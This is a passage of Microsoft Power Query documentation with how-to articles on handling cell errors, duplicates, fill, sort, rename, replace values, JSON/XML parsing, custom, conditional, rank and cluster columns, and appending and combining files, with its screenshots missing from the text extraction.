reasons, error messages, and error details provided at the cell level to understand what's
causing the errors. The following sections discuss some of the most frequent cell-level
errors in Power Query.

Data type conversion errors

Commonly triggered when changing the data type of a column in a table. Some values
found in the column could not be converted to the desired data type.

Example: You have a query that includes a column named Sales. One cell in that column
has NA as a cell value, while the rest have whole numbers as values. You decide to
convert the data type of the column from text to whole number, but the cell with the
NA value causes an error.
Possible solutions: After identifying the row with the error, you can either modify the
data source to reflect the correct value rather than NA, or you can apply a Replace error
operation to provide a value for any NA values that cause an error.

Operation errors

When trying to apply an operation that isn't supported, such as multiplying a text value
by a numeric value, an error occurs.

Example: You want to create a custom column for your query by creating a text string
that contains the phrase "Total Sales: " concatenated with the value from the Sales
column. An error occurs because the concatenation operation only supports text
columns and not numeric ones.
Possible solutions: Before creating this custom column, change the data type of the
Sales column to be text.

Nested values shown as errors

When working with data that contains nested structured values (such as tables, lists, or
records), you may sometimes encounter the following error:
Expression.Error: We cannot return a value of type {value} in this context

Details: In the past we would have returned a text value of {value}, but we
now return this error. Please see https://go.microsoft.com/fwlink/?
linkid=2099726 for more information.

These errors usually occur for two reasons:

When the Data Privacy Firewall buffers a data source, nested non-scalar values are
automatically converted to errors.
When a column defined with the Any data type contains non-scalar values, such
values will be reported as errors during load (such as in a Workbook in Excel or the
data model in Power BI Desktop).

Possible solutions:

Remove the column that contains the error, or set a non- Any data type for such a
column.
Change the privacy levels of the data sources involved to one that allows them to
be combined without being buffered.
Flatten the tables before doing a merge to eliminate columns that contain nested
structured values (such as table, record, or list).
Working with duplicate values
Article • 12/17/2022

You can work with duplicate sets of values through transformations that can remove
duplicates from your data or filter your data to show duplicates only, so you can focus
on them.

2 Warning

Power Query is case-sensitive. When working with duplicate values, Power Query
considers the case of the text, which might lead to undesired results. As a
workaround, users can apply an uppercase or lowercase transform prior to
removing duplicates.

For this article, the examples use the following table with id, Category, and Total
columns.

Remove duplicates
One of the operations that you can perform is to remove duplicate values from your
table.

1. Select the columns that contain duplicate values.

2. Go to the Home tab.

3. In the Reduce rows group, select Remove rows.

4. From the drop-down menu, select Remove duplicates.


2 Warning

There's no guarantee that the first instance in a set of duplicates will be chosen
when duplicates are removed. To learn more about how to preserve sorting, go to
Preserve sort.

Remove duplicates from multiple columns


In this example, you want to identify and remove the duplicates by using all of the
columns from your table.

You have four rows that are duplicates. Your goal is to remove those duplicate rows so
there are only unique rows in your table. Select all columns from your table, and then
select Remove duplicates.

The result of that operation will give you the table that you're looking for.
7 Note

This operation can also be performed with a subset of columns.

Remove duplicates from a single column


In this example, you want to identify and remove the duplicates by using only the
Category column from your table.

You want to remove those duplicates and only keep unique values. To remove duplicates
from the Category column, select it, and then select Remove duplicates.

The result of that operation will give you the table that you're looking for.
Keep duplicates
Another operation you can perform with duplicates is to keep only the duplicates found
in your table.

1. Select the columns that contain duplicate values.

2. Go to the Home tab.

3. In the Reduce rows group, select Keep rows.

4. From the drop-down menu, select Keep duplicates.

Keep duplicates from multiple columns


In this example, you want to identify and keep the duplicates by using all of the columns
from your table.

You have four rows that are duplicates. Your goal in this example is to keep only the
rows that are duplicated in your table. Select all the columns in your table, and then
select Keep duplicates.

The result of that operation will give you the table that you're looking for.

Keep duplicates from a single column


In this example, you want to identify and keep the duplicates by using only the id
column from your table.

In this example, you have multiple duplicates and you want to keep only those
duplicates from your table. To keep duplicates from the id column, select the id column,
and then select Keep duplicates.

The result of that operation will give you the table that you're looking for.

See also
Data profiling tools
Fill values in a column
Article • 12/17/2022

You can use fill up and fill down to replace null values with the last non-empty value in a
column. For example, imagine the following table where you'd like to fill down in the
Date column and fill up in the Comments column.

The outcome that you'd expect is shown in the following image.

Fill down
The fill down operation takes a column and traverses through the values in it to fill any
null values in the next rows until it finds a new value. This process continues on a row-
by-row basis until there are no more values in that column.
In the following example, you want to fill down on the Date column. To do that, you can
right-click to select the Date column, and then select Fill > Down.

The result of that operation will look like the following image.
Fill up
In the same way as the fill down operation, fill up works on a column. But by contrast, fill
up finds the last value of the column and fills any null values in the previous rows until it
finds a new value. Then the same process occurs for that value. This process continues
until there are no more values in that column.

In the following example, you want to fill the Comments column from the bottom up.
You'll notice that your Comments column doesn't have null values. Instead it has what
appears to be empty cells. Before you can do the fill up operation, you need to
transform those empty cells into null values: select the column, go to the Transform tab,
and then select Replace values.

In the Replace values dialog box, leave Value to find blank. For Replace with, enter null.

More information: Replace values

After all empty cells are replaced with null, select the Comments column, go to the
Transform tab, and then select Fill > Up.
The result of that operation will look like the following image.

Cleaning up your table


1. Filter the Units column to show only rows that aren't equal to null.
2. Rename the Comments column as Sales Person.

3. Remove the Sales Person: values from the Sales Person column so you only get
the names of the salespeople.

Now you should have exactly the table you were looking for.

See also
Replace values
Sort columns
Article • 08/09/2023

You can sort a table in Power Query by one column or multiple columns. For example,
take the following table with the columns named Competition, Competitor, and
Position.

For this example, the goal is to sort this table by the Competition and Position fields in
ascending order.

Sort ascending sorts alphabetical rows in a column from A to Z, then a to z. Sort


descending sorts alphabetical rows in a column from z to a, then Z to A. For example,
examine the following unsorted column:
When sorted using sort ascending, an alphabetical column is sorted in the following
way:

When sorted using sort descending, an alphabetical column is sorted in the following
way:
To sort a table by using columns
To sort the table, first select the column to be sorted. After the column has been
selected, you can select the sort operation from one of two places:

On the Home tab, in the Sort group, there are icons to sort your column in either
ascending or descending order.

From the column heading drop-down menu. Next to the name of the column
there's a drop-down menu indicator . When you select the icon, you'll see the
option to sort the column.
In this example, first you need to sort the Competition column. You'll perform the
operation by using the buttons in the Sort group on the Home tab. This action creates a
new step in the Applied steps section named Sorted rows.

A visual indicator, displayed as an arrow pointing up, gets added to the Competitor
drop-down menu icon to show that the column is being sorted in ascending order.

Now you'll sort the Position field in ascending order as well, but this time you'll use the
Position column heading drop-down menu.

Notice that this action doesn't create a new Sorted rows step, but modifies it to perform
both sort operations in one step. When you sort multiple columns, the order that the
columns are sorted in is based on the order the columns were selected in. A visual
indicator, displayed as a number to the left of the drop-down menu indicator, shows the
place each column occupies in the sort order.

To clear a sort operation from a column


Do one of the following actions:

Select the down arrow next to the column heading, and then select Clear sort.
In Applied steps on the Query Settings pane, delete the Sorted rows step.
Rename columns
Article • 12/17/2022

In Power Query, you can rename columns to format the dataset in a clear and concise
way.

As an example, let's start with a dataset that has two columns.

Column 1 Column 2

Panama Panama

USA New York

Canada Toronto

The column headers are Column 1 and Column 2, but you want to change those names
to more friendly names for your columns.

Column 1 becomes Country


Column 2 becomes City

The end result that you want in Power Query looks like the following table.

How to rename a column


There are three ways to rename a column in Power Query.

Double-click the column header: The double-click action immediately lets you
rename the column.
Right-click the column of your choice: A contextual menu is displayed and you
can select the Rename option to rename the selected column.

Rename option in the Transform tab: In the Transform tab, under the Any column
group, select the Rename option.

Avoiding duplicate column names


Power Query requires table column names to be unique across all columns. This means
that if you try to rename a column to a column name that already exists in the table, an
error with the message Column Name Conflict appears. You'll have to rename the
column to something else.

For example, for the first sample table provided in this article, imagine that you try to
rename both Column 1 and Column 2 to "Geography". An error message pops up that
prevents you from renaming the second column to "Geography".

Column name disambiguation


With many actions performed in Power Query that might result in a Column Name
Conflict, Power Query tries to disambiguate by renaming all duplicate instances of the
same column name. The way that Power Query renames these columns is by adding a
suffix to the original column name that has a separator (commonly a dot or an
underscore), and then a number that represents the instance of the duplicated column
name in the order that it was found by Power Query. This renaming can often happen
with actions such as, but not limited to:

Promoting your column headers from your first row: For example, if you tried
promoting the first row of the sample table in this article, Power Query renames
the columns to Panama and Panama_1.

7 Note
To learn more about how to promote headers from your first row, go
toPromote or demote column headers.

Expanding a column with a field name that also exists in the current table: This
can happen, for example, when you perform a merge operation and the column
with the merged table has field names that also exist in the table. When you try to
expand the fields from that column, Power Query automatically tries to
disambiguate to prevent Column Name Conflict errors.
Move columns
Article • 02/17/2023

A common process when preparing data is to move columns in the dataset.

To accomplish this move, you can either select the Move option or drag and drop the
column.

Move option
The following example shows the different ways of moving columns. This example
focuses on moving the Contact Name column.

You move the column using the Move option. This option located in the Any column
group under the Transform tab. In the Move option, the available choices are:

Before
After
To beginning
To end

You can also find this option when you right-click a column.
If you want to move one column to the left, then select Before.

The new location of the column is now one column to the left of its original location.
If you want to move one column to the right, then select After.

The new location of the column is now one column to the right of its original location.

If you want to move the column to the most left space of the dataset, then select To
beginning.
The new location of the column is now on the far left side of the table.

If you want to move the column to the most right space of the dataset, then select To
end.

The new location of the column is now on the far right side of the table.

Drag and drop


Another way to move a column through the dataset is to drag and drop the column.
Move the column to the place where you would like to place it.
Go to column feature
If you want to find a specific column, then go to the View tab in the ribbon and select
Go to column.

From there, you can specifically select the column you would like to view, which is
especially useful if there are many columns.
Replace values and errors
Article • 12/17/2022

With Power Query, you can replace one value with another value wherever that value is
found in a column. The Replace values command can be found:

On the cell shortcut menu. Right-click the cell to replace the selected value in the
column with another value.

On the column shortcut menu.

On the Home tab, in the Transform group.


On the Transform tab, in the Any column group.

The replace values operation has two modes:

Replace entire cell contents: This is the default behavior for non-text columns,
where Power Query searches for and replaces the full contents of a cell. You can
enable this mode for text columns by selecting Advanced options, and then
selecting the Match entire cell contents check box.
Replace instances of a text string: This is the default behavior for text columns,
where Power Query will search for a specific text string in all rows of a column and
replace as many instances of the text string that it finds.

Advanced options are only available in columns of the Text data type. Within that set of
options is the Replace using special characters option.
Replace entire cell contents
Imagine a table like the following, where you have columns for Account ID, Category
Name, and Sales Goal.

The value of -1 in the Sales Goal column is an error in the source and needs to be
replaced with the standard sales goal defined by the business for these instances, which
is 250,000. To do that, right-click the -1 value, and then select Replace values. This action
will bring up the Replace values dialog box with Value to find set to -1. Now all you
need to do is enter 250000 in the Replace with box.

The outcome of that operation will give you the result that you're looking for.

Replace instances of a text string


Continuing with the previous table, let's say you want to remove the text string
"Category Name: " from the Category Name column. To do that, go to the Transform
group on the Home tab, and select Replace values. In the Replace values dialog box,
enter the text string Category Name: (followed by a space) in the Value to find box,
leave the Replace with box empty, and then select OK.
The result of that operation gives you the table in the following image.
Parse text as JSON or XML
Article • 12/17/2022

In Power Query, you can parse the contents of a column with text strings by identifying
the contents as either a JSON or XML text string.

You can perform this parse operation by selecting the Parse button found inside the
following places in the Power Query Editor:

Transform tab—This button will transform the existing column by parsing its
contents.

Add column tab—This button will add a new column to the table parsing the
contents of the selected column.

For this article, you'll be using the following sample table that contains the following
columns that you need to parse:

SalesPerson—Contains unparsed JSON text strings with information about the


FirstName and LastName of the sales person, as in the following example.

JSON

{
"id" : 249319,
"FirstName": "Lesa",
"LastName": "Byrd"
}
Country—Contains unparsed XML text strings with information about the Country
and the Division that the account has been assigned to, as in the following
example.

XML

<root>
<id>1</id>
<Country>USA</Country>
<Division>BI-3316</Division>
</root>

The sample table looks as follows.

The goal is to parse the above mentioned columns and expand the contents of those
columns to get this output.

As JSON
Select the SalesPerson column. Then select JSON from the Parse dropdown menu inside
the Transform tab. These steps will transform the SalesPerson column from having text
strings to having Record values, as shown in the next image. You can select anywhere in
the whitespace inside the cell of the Record value to get a detailed preview of the
record contents at the bottom of the screen.
Select the expand icon next to the SalesPerson column header. From the expand
columns menu, select only the FirstName and LastName fields, as shown in the
following image.

The result of that operation will give you the following table.

As XML
Select the Country column. Then select the XML button from the Parse dropdown menu
inside the Transform tab. These steps will transform the Country column from having
text strings to having Table values as shown in the next image. You can select anywhere
in the whitespace inside the cell of the Table value to get a detailed preview of the
contents of the table at the bottom of the screen.

Select the expand icon next to the Country column header. From the expand columns
menu, select only the Country and Division fields, as shown in the following image.

You can define all the new columns as text columns. The result of that operation will
give you the output table that you're looking for.
Add a column from examples
Article • 12/17/2022

When you add columns from examples, you can quickly and easily create new columns
that meet your needs. This is useful for the following situations:

You know the data you want in your new column, but you're not sure which
transformation, or collection of transformations, will get you there.
You already know which transformations you need, but you're not sure what to
select in the UI to make them happen.
You know all about the transformations you need by using a custom column
expression in the M language, but one or more of those transformations aren't
available in the UI.

The Column from examples command is located on the Add column tab, in the
General group.

Add a new column from examples


In this example, you start with the table shown in the following image.
Your goal in this example is to create two new columns:

Range: Create bins for the Monthly Income column in discrete increments of
5,000.
Full Name: Concatenate the Last Name and First Name columns to a single
column.

Column from examples, from selected columns


One of the options you have when creating your new column is to select which columns
will be used in your calculations. For this example, you'll be creating the Range column
from the values in the Monthly Income column.

To do this, select the Monthly Income column, select the Column from examples
command, and then select From selection.
The preview pane displays a new, editable column where you can enter your examples.
For the first example, the value from the selected column is 19500. So in your new
column, enter the text 15000 to 20000, which is the bin where that value falls.

When Power Query finds a matching transformation, it fills the transformation results
into the remaining rows using light-colored text. You can also see the M formula text for
the transformation above the table preview.

After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.

Column from examples, from all columns


The next goal is to create a Full Name column by using the values from the First Name
and Last Name columns.

To do this, select the Column from examples command, and then select From all
columns.
Now you'll enter your first Full Name example as Enders, Maria.

After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.

Your last step is to remove the First Name, Last Name, and Monthly Income columns.
Your final table now contains the Range and Full Name columns with all the data you
produced in the previous steps.
Tips and considerations
When providing examples, Power Query offers a helpful list of available fields, values,
and suggested transformations for the selected columns. You can view this list by
selecting any cell of the new column.

It's important to note that the Column from examples experience works only on the top
100 rows of your data preview. You can apply steps before the Column from examples
step to create your own data sample. After the Column from examples column has
been created, you can delete those prior steps; the newly created column won't be
affected.

List of supported transformations


Many, but not all, transformations are available when you use Column from examples.
The following list shows the supported transformations.

General
Conditional Column

Reference

Reference to a specific column, including trim, clean, and case transformations

Text transformations

Combine (supports combination of literal strings and entire column values)


Replace
Length
Extract
First Characters
Last Characters
Range
Text before Delimiter
Text after Delimiter
Text between Delimiters
Length
Remove Characters
Keep Characters

7 Note

All Text transformations take into account the potential need to trim, clean, or apply
a case transformation to the column value.

Date transformations

Day
Day of Week
Day of Week Name
Day of Year
Month
Month Name
Quarter of Year
Week of Month
Week of Year
Year
Age
Start of Year
End of Year
Start of Month
End of Month
Start of Quarter
Days in Month
End of Quarter
Start of Week
End of Week
Day of Month
Start of Day
End of Day

Time transformations

Hour
Minute
Second
To Local Time

7 Note

All Date and Time transformations take into account the potential need to convert
the column value to Date, Time, or DateTime.

Number transformations

Absolute Value
Arccosine
Arcsine
Arctangent
Convert to Number
Cosine
Cube
Divide
Exponent
Factorial
Integer Divide
Is Even
Is Odd
Ln
Base-10 Logarithm
Modulo
Multiply
Round Down
Round Up
Sign
Sine
Square Root
Square
Subtract
Sum
Tangent
Bucketing/Ranges
Add an index column
Article • 12/17/2022

The Index column command adds a new column to the table with explicit position
values, and is usually created to support other transformation patterns.

By default, the starting index will start from the value 0 and have an increment of 1 per
row.
You can also configure the behavior of this step by selecting the Custom option and
configuring two parameters:

Starting index: Specifies the initial index value.


Increment: Specifies how much to increment each index value.

For the example in this article, you start with the following table that has only one
column, but notice the data pattern in the column.

Let's say that your goal is to transform that table into the one shown in the following
image, with the columns Date, Account, and Sale.

Step 1. Add an index column


You first need to add a new Index column to your table that starts from 0.

Step 2. Add a modulo column from the index


column
The next step is to select the newly added index column, and then on the Add column
tab, select Standard > Modulo.

In the Modulo dialog box, enter the number from which to find the remainder for each
value in the column. In this case, your pattern repeats itself every three rows, so you'll
enter 3.
The result of that operation will give you a new column named Modulo.

Step 3. Add an integer-divide column from the


index column
Select the Index column, go to the Add column tab, and then select Standard > Divide
(Integer).
In the Integer-divide dialog box, enter a number by which to divide each value in the
column. In this case, your pattern repeats itself every three rows, so enter the value 3.

Remove the Index column, because you no longer need it. Your table now looks like the
following image.
Step 4. Pivot a column
Your table now has three columns where:

Column1 contains the values that should be in the final table.


Modulo provides the column position of the value (similar to the y coordinates of
an xy chart).
Integer-division provides the row position of the value (similar to the x
coordinates of an xy chart).

To achieve the table you want, you need to pivot the Modulo column by using the
values from Column1 where these values don't get aggregated. On the Transform tab,
select the Modulo column, and then select Pivot column from the Any column group.
In the Pivot column dialog box, select the Advanced option button. Make sure Value
column is set to Column1 and Aggregate values function is set to Don't aggregate.

More information: Pivot columns

The result of that operation will give you a table with four columns, as shown in the
following image.

Step 5. Clean the table


You can now delete the Integer-division column and promote the first row of the table
to become the headers of your table. More information: Promote or demote column
headers

After defining the correct data types for your columns, you'll create a table that looks
like the following table, with exactly the three columns that you needed and the shape
that you were looking for.
Add a custom column
Article • 12/17/2022

If you need more flexibility for adding new columns than the ones provided out of the
box in Power Query, you can create your own custom column using the Power Query M
formula language.

Imagine that you have a table with the following set of columns.

Using the Units, Unit Price, and Discount columns, you'd like to create two new
columns:

Total Sale before Discount: Calculated by multiplying the Units column times the
Unit Price column.
Total Sale after Discount: Calculated by multiplying the Total Sale before Discount
column by the net percentage value (one minus the discount value).

The goal is to create a table with new columns that contain the total sales before the
discount and the total sales after the discount.

Create a custom column


On the Add column tab, select Custom column.
The Custom column dialog box appears. This dialog box is where you define the
formula to create your column.

The Custom column dialog box contains:

The initial name of your custom column in the New column name box. You can
rename this column.

A dropdown menu where you can select the data type for your new column.

An Available columns list on the right underneath the Data type selection.

A Custom column formula box where you can enter a Power Query M formula.

To add a new custom column, select a column from the Available columns list. Then,
select the Insert column button below the list to add it to the custom column formula.
You can also add a column by selecting it in the list. Alternatively, you can write your
own formula by using the Power Query M formula language in Custom column formula.
7 Note

If a syntax error occurs when you create your custom column, you'll see a yellow
warning icon, along with an error message and reason.

Adding the Total Sale before Discount column


The formula you can use to create the Total Sale before Discount column is [Units] *
[Unit Price] . In Data type, select the Currency data type.

The result of that operation adds a new Total Sale before Discount column to your
table.

7 Note
If you're using Power Query Desktop, you'll notice that the Data type field isn't
available in Custom column. This means that you'll need to define a data type for
any custom columns after creating the columns. More information: Data types in
Power Query

Adding the Total Sale after Discount column


The formula that you can use to create the Total Sale before Discount is [Total Sale
before Discount]* (1-[Discount]) . Set the data type of this new column to Currency.

The result of that operation adds a new Total Sale after Discount column to your table.

Modify an existing custom column


Power Query adds your custom column to the table and adds the Added custom step to
the Applied steps list in Query settings.
To modify your custom column, select the Added custom step in the Applied steps list.

The Custom column dialog box appears with the custom column formula you created.

7 Note

Depending on the formula you've used for your custom column, Power Query
changes the settings behavior of your step for a more simplified and native
experience. For this example, the Added custom step changed its behavior from a
standard custom column step to a Multiplication experience because the formula
from that step only multiplies the values from two columns.

Next steps
You can create a custom column in other ways, such as creating a column based on
examples you provide to Power Query Editor. More information: Add a column
from an example
For Power Query M reference information, go to Power Query M function
reference.
Add a conditional column
Article • 12/17/2022

With Power Query, you can create new columns whose values will be based on one or
more conditions applied to other columns in your table.

The Conditional column command is located on the Add column tab, in the General
group.

Adding a conditional column


In this example, you'll be using the table shown in the following image.

In this table, you have a field that gives you the CustomerGroup. You also have different
prices applicable to that customer in the Tier 1 Price, Tier 2 Price, and Tier 3 Price fields.
In this example, your goal is to create a new column with the name Final Price based on
the value found in the CustomerGroup field. If the value in the CustomerGroup field is
equal to 1, you'll want to use the value from the Tier 1 Price field; otherwise, you'll use
the value from the Tier 3 Price.

To add this conditional column, select Conditional column. In the Add conditional
column dialog box, you can define three sections numbered in the following image.
1. New column name: You can define the name of your new column. In this example,
you'll use the name Final Price.
2. Conditional clauses: Here you define your conditional clauses. You can add more
clauses by selecting Add clause. Each conditional clause will be tested on the order
shown in the dialog box, from top to bottom. Each clause has four parts:

Column name: In the drop-down list, select the column to use for the
conditional test. For this example, select CustomerGroup.
Operator: Select the type of test or operator for the conditional test. In this
example, the value from the CustomerGroup column has to be equal to 1, so
select equals.
Value: You can enter a value or select a column to be used for the conditional
test. For this example, enter 1.
Output: If the test is positive, the value entered here or the column selected
will be the output. For this example, if the CustomerGroup value is equal to 1,
your Output value should be the value from the Tier 1 Price column.

3. Final Else clause: If none of the clauses above yield a positive test, the output of
this operation will be the one defined here, as a manually entered value or a value
from a column. In this case, the output will be the value from the Tier 3 Price
column.

The result of that operation will give you a new Final Price column.

7 Note
New conditional columns won't have a data type defined. You can add a new step
to define a data type for this newly created column by following the steps
described in Data types in Power Query.

Adding and organizing multiple clauses


For this example, let's change your goal. Your new conditional clauses are:

If the value from the CustomerGroup column is equal to 1, the Output will be the
value from the Tier 1 Price column.
If the value from the CustomerGroup column is equal to 2, the Output will be the
value from the Tier 2 Price column.
If none of the previous tests are positive, the Output will be the value from the Tier
3 Price column.

7 Note

At the end of each clause, you can select the ellipsis button (...) to delete, move up,
or move down the clause.

The result of that operation will give you the result that you're looking for.
Rank column (Preview)
Article • 07/30/2022

The Rank column command adds a new column to a table with the ranking defined by
one or more other columns from the table. A Rank method option can be used to
define how ties should be handled.

7 Note

Currently, the rank column feature is only available in Power Query Online.

Adding a rank column


The following table has fields for Team , Total Points , and Bonus modifier . Imagine that
you're tasked with the creation of a new column that effectively ranks the teams using
the values from the Total Points and Bonus modifier fields.

Team Total Points Bonus modifier

A 20 0.5

B 30 0.8

C 40 0.2

D 10 0.45

E 20 0.75

The teams have shared a list of ways that they want to rank each other:

Using only the values from the Total Points field where higher values rank higher
using standard competition as the rank method
Using only the values from the Total Points field where higher values rank higher
using dense as the rank method
Ranking first by the Total Points and then by Bonus modifier where higher values
rank higher using the standard competition as rank method

Single column rank


For the first requirement shared by the teams of using only the values from the Total
Points field where higher values rank higher using standard competition as the rank
method, use the following steps:

1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.

2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.

3. By default, the rank method for this dialog is standard competition, so just select
OK. This action will give you a new step with the added Rank column.

Single column rank with specific rank method


For the second requirement shared by the teams of using only the values from the
Total Points field where higher values rank higher using dense as the rank method, use
the following steps:

1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.

2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.

3. Select Advanced at the top of the dialog box. This selection enables the advanced
section. In Rank method, change the value from Standard competition to Dense.

4. After selecting the rank method, select OK. This action will give you a new step
with the added Rank column.

Multiple column rank with specific rank method


For the third requirement shared by the teams of ranking first by the Total Points and
then by Bonus modifier where higher values rank higher using the standard competition
as rank method, use the following steps:
1. With the original table already in Power Query, select the Total Points and then
Bonus modifier columns. Then from the Power Query Add column tab, select Rank
column.

2. The rank dialog appears with its advanced section open, with both fields selected
in the Rank by column. Total Points is in the first row and then Bonus modifier
below it. Both rows use the Rank criteria of Higher value ranks higher.

3. Make sure that Rank method at the bottom is set to Standard competition.

4. After verifying the above, select OK. This action will give you a new step with the
added Rank column.

Rank methods
A rank method establishes the strategy in which ties are handled by the ranking
algorithm. This option is only available in the advanced section of the Rank dialog.

The following table lists all three available rank methods and provides a description for
each.
Rank Description
method

Standard Items that compare equally receive the same ranking number, and then a gap is
competition left in the ranking numbers. For example, 1224.

Dense Items that compare equally receive the same ranking number, and the next items
receive the immediately following ranking number. For example, 1223.

Ordinal All items receive distinct ordinal numbers, including items that compare equally.
For example, 1234.
Cluster values
Article • 12/17/2022

Cluster values automatically create groups with similar values using a fuzzy matching
algorithm, and then maps each column's value to the best-matched group. This
transform is very useful when you're working with data that has many different
variations of the same value and you need to combine values into consistent groups.

Consider a sample table with an id column that contains a set of IDs and a Person
column containing a set of variously spelled and capitalized versions of the names
Miguel, Mike, William, and Bill.

In this example, the outcome you're looking for is a table with a new column that shows
the right groups of values from the Person column and not all the different variations of
the same words.
7 Note

The Cluster values feature is available only for Power Query Online.

Create a Cluster column


To cluster values, first select the Person column, go to the Add column tab in the
ribbon, and then select the Cluster values option.

In the Cluster values dialog box, confirm the column that you want to use to create the
clusters from, and enter the new name of the column. For this case, name this new
column Cluster.

The result of that operation yields the result shown in the next image.
7 Note

For each cluster of values, Power Query picks the most frequent instance from the
selected column as the "canonical" instance. If multiple instances occur with the
same frequency, Power Query picks the first one.

Using the fuzzy cluster options


The following options are available for clustering values in a new column:

Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 causes all values to be
grouped together. The maximum setting of 1 only allows values that match exactly
to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case is ignored. This option is enabled
by default.
Group by combining text parts: The algorithm tries to combine text parts (such as
combining Micro and soft into Microsoft) to group values.
Show similarity scores: Shows similarity scores between the input values and
computed representative values after fuzzy clustering.
Transformation table (optional): You can select a transformation table that maps
values (such as mapping MSFT to Microsoft) to group them together.

For this example, a new transformation table with the name My transform table is used
to demonstrate how values can be mapped. This transformation table has two columns:

From: The text string to look for in your table.


To: The text string to use to replace the text string in the From column.
) Important

It's important that the transformation table has the same columns and column
names as shown in the previous image (they have to be named "From" and "To"),
otherwise Power Query won't recognize this table as a transformation table, and no
transformation will take place.

Using the previously created query, double-click the Clustered values step, then in the
Cluster values dialog box, expand Fuzzy cluster options. Under Fuzzy cluster options,
enable the Show similarity scores option. For Transformation table (optional), select
the query that has the transform table.
After selecting your transformation table and enabling the Show similarity scores
option, select OK. The result of that operation will give you a table that contains the
same id and Person columns as the original table, but also includes two new columns
on the right called Cluster and Person_Cluster_Similarity. The Cluster column contains
the properly spelled and capitalized versions of the names Miguel for versions of Miguel
and Mike, and William for versions of Bill, Billy, and William. The
Person_Cluster_Similarity column contains the similarity scores for each of the names.
Append queries
Article • 12/17/2022

The append operation creates a single table by adding the contents of one or more
tables to another, and aggregates the column headers from the tables to create the
schema for the new table.

7 Note

When tables that don't have the same column headers are appended, all column
headers from all tables are appended to the resulting table. If one of the appended
tables doesn't have a column header from other tables, the resulting table shows
null values in the respective column, as shown in the previous image in columns C
and D.

You can find the Append queries command on the Home tab in the Combine group.
On the drop-down menu, you'll see two options:

Append queries displays the Append dialog box to add additional tables to the
current query.
Append queries as new displays the Append dialog box to create a new query by
appending multiple tables.

The append operation requires at least two tables. The Append dialog box has two
modes:
Two tables: Combine two table queries together. This mode is the default mode.
Three or more tables: Allow an arbitrary number of table queries to be combined.

7 Note

The tables will be appended in the order in which they're selected, starting with the
Primary table for the Two tables mode and from the primary table in the Tables to
append list for the Three or more tables mode.

Append two tables


For the example in this article, we'll use the following two tables with sample data:

Online Sales: Sales made through an online channel.

Store Sales: Sales made through the company's physical locations.

To append these tables, first select the Online Sales table. On the Home tab, select
Append queries, which creates a new step in the Online Sales query. The Online Sales
table will be the primary table. The table to append to the primary table will be Store
Sales.
Power Query performs the append operation based on the names of the column
headers found on both tables, and not based on their relative position in the headers
sections of their respective tables. The final table will have all columns from all tables
appended.

In the event that one table doesn't have columns found in another table, null values will
appear in the corresponding column, as shown in the Referer column of the final query.

Append three or more tables


In this example, you want to append not only the Online Sales and Store Sales tables,
but also a new table named Wholesale Sales.

The new approach for this example is to select Append queries as new, and then in the
Append dialog box, select the Three or more tables option button. In the Available
table(s) list, select each table you want to append, and then select Add. After all the
tables you want appear in the Tables to append list, select OK.

After selecting OK, a new query will be created with all your tables appended.
Combine files overview
Article • 02/17/2023

With Power Query, you can combine multiple files that have the same schema into a
single logical table.

This feature is useful when you want to combine all the files you have in the same folder.
For example, if you have a folder that contains monthly files with all the purchase orders
for your company, you can combine these files to consolidate the orders into a single
view.

Files can come from a variety of sources, such as (but not limited to):

Local folders
SharePoint sites
Azure Blob storage
Azure Data Lake Storage (Gen1 and Gen2)

When working with these sources, you'll notice that they share the same table schema,
commonly referred to as the file system view. The following screenshot shows an
example of the file system view.

In the file system view, the Content column contains the binary representation of each
file.

7 Note

You can filter the list of files in the file system view by using any of the available
fields. It's good practice to filter this view to show only the files you need to
combine, for example by filtering fields such as Extension or Folder Path. More
information: Folder

Selecting any of the [Binary] values in the Content column automatically creates a series
of navigation steps to that specific file. Power Query will try to interpret the binary by
using one of the available connectors, such as Text/CSV, Excel, JSON, or XML.

Combining files takes place in the following stages:

Table preview
Combine files dialog box
Combined files output

Table preview
When you connect to a data source by using any of the previously mentioned
connectors, a table preview opens. If you're certain that you want to combine all the files
in the folder, select Combine in the lower-right corner of the screen.

Alternatively, you can select Transform data to access the Power Query Editor and
create a subset of the list of files (for example, by using filters on the folder path column
to only include files from a specific subfolder). Then combine files by selecting the
column that contains the binaries in the Content column and then selecting either:

The Combine files command in the Combine group on the Home tab.
The Combine files icon in the column header of the column that contains [Binary]
values.

Combine files dialog box


After you select the Combine or Combine files command, the Combine files dialog box
opens and the following occurs:

1. Power Query analyzes the example file (by default, the first file in the list) and
determines the correct file connector to use to open that file.
2. The dialog box provides the file connector experience exactly as if you were to
connect directly to that example file.

If you want to use a different file for the example file, you can choose it from
the Example file drop-down menu.
Optional: You can select Skip files with errors to exclude from the final
output any files that result in errors.

In the following image, Power Query has detected that the first file has a .csv file name
extension, so it uses the Text/CSV connector to interpret the file.
Combined files output
After the Combine files process is finished, Power Query automatically performs the
following actions:

1. Creates an example query that performs all the required extraction steps for a
single file. It uses the file that was selected as the example file in the Combine files
dialog box.

This example query has the name Transform Sample file in the Queries pane.

2. Creates a function query that parameterizes the file/binary input to the example
query. The example query and the function query are linked, so that changes to
the example query are reflected in the function query.

These queries are listed in the Helper queries group.

3. Applies the function query to the original query with input binaries (for example,
the folder query) so it applies the function query for binary inputs on each row,
and then expands the resulting data extraction as top-level columns.

4. Creates a new group with the prefix Transform file from and the initial query as
the suffix, and organizes all the components used to create these combined files in
that group.
You can easily combine all files within a given folder, as long as they have the same file
type and structure (including the same columns). You can also apply additional
transformation or extraction steps by modifying the automatically generated example
query, without having to worry about modifying or creating additional function query
steps.

7 Note

You can modify the steps inside the example query to change the function applied
to each binary in your query. The example query is linked to the function, so any
changes made to the example query will be reflected in the function query.

If any of the changes affect column names or column data types, be sure to check
the last step of your output query. Adding a Change column type step can
introduce a step-level error that prevents you from visualizing your table. More
information: Dealing with errors

See also
Combine CSV files
Combine CSV files
Article • 02/17/2023

In Power Query, you can combine multiple files from a given data source. This article
